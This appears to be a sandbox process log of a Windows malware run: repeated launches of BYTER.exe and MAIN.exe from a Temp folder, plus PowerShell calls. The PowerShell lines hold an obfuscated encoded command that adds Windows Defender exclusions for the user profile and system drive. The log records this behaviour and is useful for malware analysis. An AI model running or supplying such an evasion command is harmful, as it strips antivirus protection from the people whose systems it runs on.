"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1760597343-8288439651944488240-239102127-100156141810872266401751689826208226846"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "464246134-516785921-1804402230-1075254709-670951212192293366716143279881461977868"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1630216740-270672682-13908016851087346497-8557197681493966897845646012-1523906610"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
